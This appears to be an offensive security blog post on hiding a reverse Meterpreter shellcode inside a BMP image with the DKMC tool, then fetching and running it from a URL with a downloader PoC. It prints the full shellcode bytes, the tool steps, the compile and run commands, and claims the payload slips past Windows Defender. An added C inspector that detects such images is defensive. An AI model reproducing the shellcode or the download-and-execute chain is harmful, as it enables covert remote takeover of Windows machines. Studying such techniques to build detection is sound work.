DKMC is a tool written by Mr.Un1k0d3r (https://twitter.com/MrUn1k0d3r) that writes shellcode into valid pictures. I wrote a PoC that can be used with it (and, of course, with any other raw shellcode). The PoC downloads a shellcode file into memory and then executes the shellcode.
Download DKMC: https://github.com/Mr-Un1k0d3r/DKMC
Update: The PoC is now part of DKMC, see DKMC/core/util/downloadshellcodebin.c.
(You can download the source code of the PoC here: https://github.com/govolution/avepoc/blob/master/downloadshellcodebin.c)
Make the picture with the shellcode
After installing and starting DKMC, perform the following steps:
Step (1)
Select an option:
[*] (gen) Generate a malicious BMP image
[*] (web) Start a web server and deliver malicious image
[*] (ps) Generate Powershell payload
[*] (sc) Generate shellcode from raw file
[*] (exit) Quit the application
>>> gen
Step (2)
The shellcode is a connect-back (reverse) Meterpreter in this case.
(generate)>>> set shellcode \xdd\xc3\xb8\xa3\xb6\x96\x21\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x85\x31\x47\x18\x03\x47\x18\x83\xef\x5f\x54\x63\xdd\x77\x1b\x8c\x1e\x87\x7c\x04\xfb\xb6\xbc\x72\x8f\xe8\x0c\xf0\xdd\x04\xe6\x54\xf6\x9f\x8a\x70\xf9\x28\x20\xa7\x34\xa9\x19\x9b\x57\x29\x60\xc8\xb7\x10\xab\x1d\xb9\x55\xd6\xec\xeb\x0e\x9c\x43\x1c\x3b\xe8\x5f\x97\x77\xfc\xe7\x44\xcf\xff\xc6\xda\x44\xa6\xc8\xdd\x89\xd2\x40\xc6\xce\xdf\x1b\x7d\x24\xab\x9d\x57\x75\x54\x31\x96\xba\xa7\x4b\xde\x7c\x58\x3e\x16\x7f\xe5\x39\xed\x02\x31\xcf\xf6\xa4\xb2\x77\xd3\x55\x16\xe1\x90\x59\xd3\x65\xfe\x7d\xe2\xaa\x74\x79\x6f\x4d\x5b\x08\x2b\x6a\x7f\x51\xef\x13\x26\x3f\x5e\x2b\x38\xe0\x3f\x89\x32\x0c\x2b\xa0\x18\x58\xc5\xde\xd6\x98\x71\x56\x7e\xf6\xe8\xcc\xe8\x4a\x9c\xca\xef\xad\xb7\x22\x2b\x02\x6b\x16\x98\xf7\xe3\xa2\x48\x8e\x54\x2d\xa1\x23\xc8\xb8\x49\x90\xbd\x54\xf5\x17\x42\xa5\xe1\x2d\x43\xa5\xf1\x7e\x74\xc8\xa5\xce\x2b\x45\x09\x98\xaa\x39\xdf\x77\x40\xfc\x90\x2d\xd9\x41\x6c\xe6\x8c\x10\x3b\x49\x70\xdf\xea\x06\xbb\x9e\x5b\xa1\xa7\x6c\x03\xb4\x64\x23\xbd\x52\x59\xd1\x72\xee\xcf\x56\x17\x64\x9a\xfe\xb2\x4e\x63\xc9\x0b\x9a\xf7\x0c\x47\x88\x9d\x28\x93\x1c\x0d\x98\x95\xca\xbb\xaa\x76\xa5\x48\x5c\xbf\x3d\xc1\xfa\xef\xc9\x45\x98\x66\x6b\x3c\x24\x34\xca\xed\xea\xb4\xa0\x86\x27\x5b\x79\x68\x72\xa8\x1e\xb9\xce\x89\xb0\xd7\x8b\x38\x52\x18\x44\x7a\xa1\x1a\x36\x30\x81\xd6\x80\xf8\x44\xd3\xd8\x92\x09\x43\x73\x2b\x81\x14\x21\xfa\xc4\x80\x8d\x9f\x75\x7b\x3d\x59\x0d\xdb\x27\xd4\x87\xbc\xde\x8e\x65\x77\x6c\x3e\xc7\x28\x25\xb0\xa6\x9b\xc3\x55\x2d\x66\x07\xf0\xe1\x16\x15\x8b\x97\x85\xd9\x23\x0f\x7d\x53\x5c\x09\x7e\xb6\xea\x53\xd2\x51\xed\x69\x35\x25\xbe\xde\xe6\x71\x12\xb6\x60\x95\xc1\x18\x4a\x96\x3f\xf2\xc6\x62\x9f\x92\x96\x40\x1f\x62\x1e\x46\x75\x66\x70\xed\x95\x30\x18\x84\xef\x22\x5e\x99\x25\x09\x0c\x35\x95\xfb\xda\x94\x1f\x1b\x60\x18\xca\x9e\x56\x93\xe1\xc8\xde\x4f\x0a\x08\xb7\x2b\xfa\x3d\xa7\x4b\x2f\x72\x52\x79\x38\xc6\x9c\x81\xb9\xbc\xdc\xe9\xb9\x50\xdd\xe9\xd1\x50\xdd\xa9\x21\x03\xb5\x71\x86\xf0\xa0\x7d\x13\x65\x79\xd1\x15\x6e\x29\xbd\x25\x50\xd6\x3d\x75\xc6\xbe\x2f\xef\x6f\xdc\xaf\xda\xea\xe1\x24\x2a\x7f\xe6\xc5\x77\xfa\x29\xb0\x92\x5c\x69\x64\xb5\x37\x92\x64\xba\xf6\x55\xa9\x6b\xc9\x93\xf5\x5d\x1b\xf2\x34\x92\x68\x0a\x8c\x22\x3b\xa8\xa4\xa8\x43\xfe\xb7\xf8
Step (3)
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x13828655
[+] Shellcode size 0x22c (556) bytes
[+] Generating magic bytes 0x85240292
[+] Final shellcode length is 0x27f (639) bytes
[+] New BMP header set to 0x424de97cc40300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/tools/DKMC/output/output-1520014787.bmp)
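The two header lines in that output are the whole trick: the new header 0x424de97cc40300 still starts with "BM", but executed as 32-bit x86 code those bytes are inc edx, dec ebp and then an E9 jmp rel32 whose displacement lives in the file-size field, and the height is lowered so viewers render only the untouched rows. The following is an added example, not DKMC's code and not the PoC: a small C inspector that decodes exactly those fields from a BMP and reports whether the header is executable and where its jump lands relative to the declared pixel data. The sample file it builds (bmp_inspect, build_sample and the 4x3 image are all mine) is constructed to mirror the output above, not a real DKMC file, and the exact internal layout of real DKMC output beyond those header fields is an assumption.

```c
/* Added example, not DKMC or PoC code: detect the DKMC-style executable
 * BMP header. Assumed layout, taken from the tool output on this page:
 * bytes 0-1 "BM", byte 2 = 0xE9 (jmp rel32, displacement in bytes 3..6),
 * biHeight reduced so the bytes past the declared pixel data are never drawn. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct bmp_report {
    int      valid_magic;   /* file starts with "BM" */
    int      jmp_header;    /* byte 2 == 0xE9: size field doubles as jmp rel32 */
    uint32_t jmp_target;    /* file offset the jmp would land on */
    uint32_t pixel_offset;  /* bfOffBits */
    int32_t  width, height; /* biWidth, biHeight (negative = top-down) */
    uint16_t bpp;           /* biBitCount */
    uint32_t pixel_end;     /* pixel_offset + rows * padded stride */
    size_t   trailing;      /* bytes after the declared pixel data */
};

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Fills *r; returns 1 when the header is executable and its jmp lands inside
 * the file but past the pixel data the (possibly reduced) height declares. */
int bmp_inspect(const uint8_t *buf, size_t len, struct bmp_report *r) {
    memset(r, 0, sizeof *r);
    if (len < 54) return 0;                 /* BITMAPFILEHEADER (14) + BITMAPINFOHEADER (40) */
    r->valid_magic = buf[0] == 'B' && buf[1] == 'M';
    r->jmp_header  = buf[2] == 0xE9;
    /* rel32 is relative to the end of the 5-byte jmp that starts at offset 2 */
    if (r->jmp_header) r->jmp_target = 7 + rd32(buf + 3);
    r->pixel_offset = rd32(buf + 10);
    r->width  = (int32_t)rd32(buf + 18);
    r->height = (int32_t)rd32(buf + 22);
    r->bpp    = rd16(buf + 28);
    if (r->width <= 0 || r->bpp == 0) return 0;
    uint32_t rows   = (uint32_t)(r->height < 0 ? -r->height : r->height);
    uint32_t stride = (((uint32_t)r->width * r->bpp + 31) / 32) * 4;   /* rows are 4-byte aligned */
    r->pixel_end = r->pixel_offset + rows * stride;
    r->trailing  = len > r->pixel_end ? len - r->pixel_end : 0;
    /* byte 2 is 0xE9 in roughly 1 of 256 benign files, so also require the
       jump to land on bytes that no viewer will draw */
    return r->valid_magic && r->jmp_header &&
           r->jmp_target >= r->pixel_end && r->jmp_target < len;
}

/* Constructed sample (not a real DKMC file): a 4x3 24-bpp BMP, stride 12,
 * 90 bytes. With patched != 0 it is altered the way the output above shows:
 * jmp in the size field aimed at the end of the original file, biHeight cut
 * from 3 to 2, and a 6-byte 0xCC (int3) placeholder stage appended. */
size_t build_sample(uint8_t *out, size_t cap, int patched) {
    const size_t orig_len = 54 + 12 * 3;
    const size_t stage_len = patched ? 6 : 0;
    if (cap < orig_len + stage_len) return 0;
    memset(out, 0, orig_len + stage_len);
    out[0] = 'B'; out[1] = 'M';
    wr32(out + 2, (uint32_t)orig_len);   /* bfSize */
    wr32(out + 10, 54);                  /* bfOffBits */
    wr32(out + 14, 40);                  /* biSize */
    wr32(out + 18, 4);                   /* biWidth */
    wr32(out + 22, 3);                   /* biHeight */
    wr16(out + 26, 1);                   /* biPlanes */
    wr16(out + 28, 24);                  /* biBitCount */
    memset(out + 54, 0x7F, 36);          /* grey pixels */
    if (patched) {
        out[2] = 0xE9;                               /* jmp: target = 7 + rel32 = orig_len */
        wr32(out + 3, (uint32_t)orig_len - 7);       /* overwrites bfSize bytes 3..5 and reserved byte 6 */
        wr32(out + 22, 2);                           /* drop the top row */
        memset(out + orig_len, 0xCC, stage_len);     /* placeholder stage */
    }
    return orig_len + stage_len;
}

int main(void) {
    uint8_t buf[128];
    struct bmp_report r;
    for (int patched = 0; patched < 2; patched++) {
        size_t n = build_sample(buf, sizeof buf, patched);
        int hit = bmp_inspect(buf, n, &r);
        printf("%s: jmp_header=%d target=%u height=%d pixel_end=%u trailing=%zu -> %s\n",
               patched ? "patched" : "clean", r.jmp_header, r.jmp_target, r.height,
               r.pixel_end, r.trailing, hit ? "DKMC-style" : "ok");
    }
    return 0;
}
```

Run on the real output above, the same arithmetic gives a jump target of 7 + 0x3c47c = 247939 and a declared pixel area ending at 54 + 270 * 900 = 243054, so the jump lands on bytes the lowered height hides from every image viewer; a benign file has its low size byte at offset 2 and its height matching the data actually present.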
DKMC includes a web server to deliver the image (the web option in the menu above), or copy the file to your favorite web server.
Usage
Compile (a Windows gcc run under wine, producing a.exe): wine gcc -s -m32 downloadshellcodebin.c -lwsock32 -lWs2_32
Run it with the URL of the image as the only argument: a.exe http://192.168.2.103/output-1520014787.bmp
BTW, tested with an up-to-date Windows 10 and not recognized by Defender.
Of course, the PoC can also handle raw shellcode output files from MSF; the shellcode does not have to be wrapped in an image.